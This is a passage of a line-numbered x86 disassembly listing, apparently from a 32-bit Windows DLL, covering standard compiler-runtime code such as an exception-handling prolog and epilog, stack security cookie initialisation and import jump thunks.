%ebp,%esp 957 | 100019bb: 5d pop %ebp 958 | 100019bc: c3 ret 959 | 100019bd: cc int3 960 | 100019be: ff 25 60 20 00 10 jmp *0x10002060 961 | 100019c4: ff 25 5c 20 00 10 jmp *0x1000205c 962 | 100019ca: ff 25 58 20 00 10 jmp *0x10002058 963 | 100019d0: ff 25 50 20 00 10 jmp *0x10002050 964 | 100019d6: cc int3 965 | 100019d7: cc int3 966 | 100019d8: 68 31 1a 00 10 push $0x10001a31 967 | 100019dd: 64 ff 35 00 00 00 00 pushl %fs:0x0 968 | 100019e4: 8b 44 24 10 mov 0x10(%esp),%eax 969 | 100019e8: 89 6c 24 10 mov %ebp,0x10(%esp) 970 | 100019ec: 8d 6c 24 10 lea 0x10(%esp),%ebp 971 | 100019f0: 2b e0 sub %eax,%esp 972 | 100019f2: 53 push %ebx 973 | 100019f3: 56 push %esi 974 | 100019f4: 57 push %edi 975 | 100019f5: a1 00 30 00 10 mov 0x10003000,%eax 976 | 100019fa: 31 45 fc xor %eax,-0x4(%ebp) 977 | 100019fd: 33 c5 xor %ebp,%eax 978 | 100019ff: 50 push %eax 979 | 10001a00: 89 65 e8 mov %esp,-0x18(%ebp) 980 | 10001a03: ff 75 f8 pushl -0x8(%ebp) 981 | 10001a06: 8b 45 fc mov -0x4(%ebp),%eax 982 | 10001a09: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 983 | 10001a10: 89 45 
f8 mov %eax,-0x8(%ebp) 984 | 10001a13: 8d 45 f0 lea -0x10(%ebp),%eax 985 | 10001a16: 64 a3 00 00 00 00 mov %eax,%fs:0x0 986 | 10001a1c: c3 ret 987 | 10001a1d: 8b 4d f0 mov -0x10(%ebp),%ecx 988 | 10001a20: 64 89 0d 00 00 00 00 mov %ecx,%fs:0x0 989 | 10001a27: 59 pop %ecx 990 | 10001a28: 5f pop %edi 991 | 10001a29: 5f pop %edi 992 | 10001a2a: 5e pop %esi 993 | 10001a2b: 5b pop %ebx 994 | 10001a2c: 8b e5 mov %ebp,%esp 995 | 10001a2e: 5d pop %ebp 996 | 10001a2f: 51 push %ecx 997 | 10001a30: c3 ret 998 | 10001a31: 8b ff mov %edi,%edi 999 | 10001a33: 55 push %ebp 1000 | 10001a34: 8b ec mov %esp,%ebp 1001 | 10001a36: ff 75 14 pushl 0x14(%ebp) 1002 | 10001a39: ff 75 10 pushl 0x10(%ebp) 1003 | 10001a3c: ff 75 0c pushl 0xc(%ebp) 1004 | 10001a3f: ff 75 08 pushl 0x8(%ebp) 1005 | 10001a42: 68 8e 12 00 10 push $0x1000128e 1006 | 10001a47: 68 00 30 00 10 push $0x10003000 1007 | 10001a4c: e8 b9 00 00 00 call 0x10001b0a 1008 | 10001a51: 83 c4 18 add $0x18,%esp 1009 | 10001a54: 5d pop %ebp 1010 | 10001a55: c3 ret 1011 | 10001a56: 8b ff mov %edi,%edi 1012 | 10001a58: 55 push %ebp 1013 | 10001a59: 8b ec mov %esp,%ebp 1014 | 10001a5b: 83 ec 10 sub $0x10,%esp 1015 | 10001a5e: a1 00 30 00 10 mov 0x10003000,%eax 1016 | 10001a63: 83 65 f8 00 andl $0x0,-0x8(%ebp) 1017 | 10001a67: 83 65 fc 00 andl $0x0,-0x4(%ebp) 1018 | 10001a6b: 53 push %ebx 1019 | 10001a6c: 57 push %edi 1020 | 10001a6d: bf 4e e6 40 bb mov $0xbb40e64e,%edi 1021 | 10001a72: bb 00 00 ff ff mov $0xffff0000,%ebx 1022 | 10001a77: 3b c7 cmp %edi,%eax 1023 | 10001a79: 74 0d je 0x10001a88 1024 | 10001a7b: 85 c3 test %eax,%ebx 1025 | 10001a7d: 74 09 je 0x10001a88 1026 | 10001a7f: f7 d0 not %eax 1027 | 10001a81: a3 04 30 00 10 mov %eax,0x10003004 1028 | 10001a86: eb 60 jmp 0x10001ae8 1029 | 10001a88: 56 push %esi 1030 | 10001a89: 8d 45 f8 lea -0x8(%ebp),%eax 1031 | 10001a8c: 50 push %eax 1032 | 10001a8d: ff 15 30 20 00 10 call *0x10002030 1033 | 10001a93: 8b 75 fc mov -0x4(%ebp),%esi 1034 | 10001a96: 33 75 f8 xor -0x8(%ebp),%esi 1035 
| 10001a99: ff 15 00 20 00 10 call *0x10002000 1036 | 10001a9f: 33 f0 xor %eax,%esi 1037 | 10001aa1: ff 15 04 20 00 10 call *0x10002004 1038 | 10001aa7: 33 f0 xor %eax,%esi 1039 | 10001aa9: ff 15 08 20 00 10 call *0x10002008 1040 | 10001aaf: 33 f0 xor %eax,%esi 1041 | 10001ab1: 8d 45 f0 lea -0x10(%ebp),%eax 1042 | 10001ab4: 50 push %eax 1043 | 10001ab5: ff 15 0c 20 00 10 call *0x1000200c 1044 | 10001abb: 8b 45 f4 mov -0xc(%ebp),%eax 1045 | 10001abe: 33 45 f0 xor -0x10(%ebp),%eax 1046 | 10001ac1: 33 f0 xor %eax,%esi 1047 | 10001ac3: 3b f7 cmp %edi,%esi 1048 | 10001ac5: 75 07 jne 0x10001ace 1049 | 10001ac7: be 4f e6 40 bb mov $0xbb40e64f,%esi 1050 | 10001acc: eb 0b jmp 0x10001ad9 1051 | 10001ace: 85 f3 test %esi,%ebx 1052 | 10001ad0: 75 07 jne 0x10001ad9 1053 | 10001ad2: 8b c6 mov %esi,%eax 1054 | 10001ad4: c1 e0 10 shl $0x10,%eax 1055 | 10001ad7: 0b f0 or %eax,%esi 1056 | 10001ad9: 89 35 00 30 00 10 mov %esi,0x10003000 1057 | 10001adf: f7 d6 not %esi 1058 | 10001ae1: 89 35 04 30 00 10 mov %esi,0x10003004 1059 | 10001ae7: 5e pop %esi 1060 | 10001ae8: 5f pop %edi 1061 | 10001ae9: 5b pop %ebx 1062 | 10001aea: c9 leave 1063 | 10001aeb: c3 ret 1064 | 10001aec: ff 25 4c 20 00 10 jmp *0x1000204c 1065 | 10001af2: ff 25 48 20 00 10 jmp *0x10002048 1066 | 10001af8: ff 25 44 20 00 10 jmp *0x10002044 1067 | 10001afe: ff 25 3c 20 00 10 jmp *0x1000203c 1068 | 10001b04: ff 25 38 20 00 10 jmp *0x10002038 1069 | 10001b0a: ff 25 40 20 00 10 jmp *0x10002040 1070 | --------------------------------------------------------------------------------